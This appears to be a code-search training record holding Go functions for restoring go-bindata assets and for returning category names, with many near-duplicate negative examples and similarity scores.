RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}" ]
[ "0.7935779", "0.7935779", "0.7935779", "0.7935779", "0.79253083", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187", "0.7924187" ]
0.0
-1
RestoreAssets restores an asset under the given directory recursively.
func RestoreAssets(dir, name string) error { children, err := AssetDir(name) // File if err != nil { return RestoreAsset(dir, name) } // Dir for _, child := range children { err = RestoreAssets(dir, filepath.Join(name, child)) if err != nil { return err } } return nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func RestoreAssets(dir, name string) error {\n\tchildren, err := AssetDir(name)\n\tif err != nil { // File\n\t\treturn RestoreAsset(dir, name)\n\t} else { // Dir\n\t\tfor _, child := range children {\n\t\t\terr = RestoreAssets(dir, path.Join(name, child))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}", "func RestoreAssets(dir, name string) error {\n\tchildren, err := AssetDir(name)\n\tif err != nil { // File\n\t\treturn RestoreAsset(dir, name)\n\t} else { // Dir\n\t\tfor _, child := range children {\n\t\t\terr = RestoreAssets(dir, path.Join(name, child))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}", "func RestoreAssets(dir, name string) error {\n\tchildren, err := AssetDir(name)\n\tif err != nil { // File\n\t\treturn RestoreAsset(dir, name)\n\t} else { // Dir\n\t\tfor _, child := range children {\n\t\t\terr = RestoreAssets(dir, path.Join(name, child))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}", "func RestoreAssets(dir, name string) error {\n\tchildren, err := AssetDir(name)\n\tif err != nil { // File\n\t\treturn RestoreAsset(dir, name)\n\t} else { // Dir\n\t\tfor _, child := range children {\n\t\t\terr = RestoreAssets(dir, path.Join(name, child))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}" ]
[ "0.78792614", "0.78792614", "0.78792614", "0.78792614" ]
0.0
-1
GetCategory returns the Category name of the DockerModule
func (m *Module) GetCategory() string { return "docker" }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (Lawrencium) GetCategory() string {\n\tvar c categoryType = actinoid\n\treturn c.get()\n}", "func Category() string {\n\treturn category\n}", "func (Samarium) GetCategory() string {\n\tvar c categoryType = lanthanoid\n\treturn c.get()\n}", "func (Sodium) GetCategory() string {\n\tvar c categoryType = alkaliMetal\n\treturn c.get()\n}", "func (Krypton) GetCategory() string {\n\tvar c categoryType = nobleGas\n\treturn c.get()\n}", "func (Technetium) GetCategory() string {\n\tvar c categoryType = transitionMetal\n\treturn c.get()\n}", "func (Tellurium) GetCategory() string {\n\tvar c categoryType = metalloid\n\treturn c.get()\n}", "func (Phosphorus) GetCategory() string {\n\tvar c categoryType = nonMetal\n\treturn c.get()\n}", "func (Molybdenum) GetCategory() string {\n\tvar c categoryType = transitionMetal\n\treturn c.get()\n}", "func (m *DirectoryAudit) GetCategory()(*string) {\n return m.category\n}", "func (Fermium) GetCategory() string {\n\tvar c categoryType = actinoid\n\treturn c.get()\n}", "func (Cadmium) GetCategory() string {\n\tvar c categoryType = transitionMetal\n\treturn c.get()\n}", "func (Manganese) GetCategory() string {\n\tvar c categoryType = transitionMetal\n\treturn c.get()\n}", "func (flag *flag) GetCategory() string {\n\treturn \"\"\n}", "func (l *Log) Category(name string) string {\n\tfor i := range l.Categories {\n\t\tif l.Categories[i].Name == name {\n\t\t\treturn l.Categories[i].Value\n\t\t}\n\t}\n\n\treturn \"\"\n}", "func tagToCategoryName(tagName string) string {\n\treturn fmt.Sprintf(\"openshift-%s\", tagName)\n}", "func (m *ManagementTemplateStep) GetCategory()(*ManagementCategory) {\n val, err := m.GetBackingStore().Get(\"category\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*ManagementCategory)\n }\n return nil\n}", "func (s *AdapterConfig) Category() string {\n\treturn base.CategoryAdapterConfig\n}", "func (f *FlagBase[T, C, V]) GetCategory() string {\n\treturn f.Category\n}", "func (c *ConsulServiceRegistry) Category() supervisor.ObjectCategory {\n\treturn Category\n}", "func (m *DeviceManagementConfigurationSettingDefinition) GetCategoryId()(*string) {\n val, err := m.GetBackingStore().Get(\"categoryId\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*string)\n }\n return nil\n}", "func (o *SoftwarerepositoryCategoryMapper) GetCategory() string {\n\tif o == nil || o.Category == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Category\n}", "func GetSingleCategory(id string) (ModuleCategory.Category, error) {\n\n\tdb := Database.CreateConnection()\n\tdefer db.Close()\n\n\tvar category ModuleCategory.Category\n\n\t// create the select sql query\n\tsqlStatement := `select\n\tcategory_id,\n\tcategory_name,\n\tcategory_description,\n\tcategory_logo,\n\tmodule_id\nfrom\n\tapp_category\nwhere\n\tcategory_id = $1`\n\n\t// execute the sql statement\n\trow := db.QueryRow(sqlStatement, id)\n\n\t// unmarshal the row object to user\n\terr := row.Scan(&category.Catid, &category.Name, &category.Description, &category.Logo, &category.Modid)\n\n\tswitch err {\n\tcase sql.ErrNoRows:\n\t\terr = errors.New(\"Нет данных\")\n\tcase nil:\n\t\treturn category, nil\n\tdefault:\n\t\tlog.Error(err)\n\t\terr = errors.New(\"Ошибка запроса\")\n\t}\n\n\t// return empty module on error\n\treturn category, err\n\n}", "func PackageCategoryFromName(category string) (PackageCategory, error) {\n\tswitch category {\n\tcase \"skip-prediction\":\n\t\treturn SkipCategoryPrediction, nil\n\tcase \"ai-machine-learning\":\n\t\treturn AIMachineLearning, nil\n\tcase 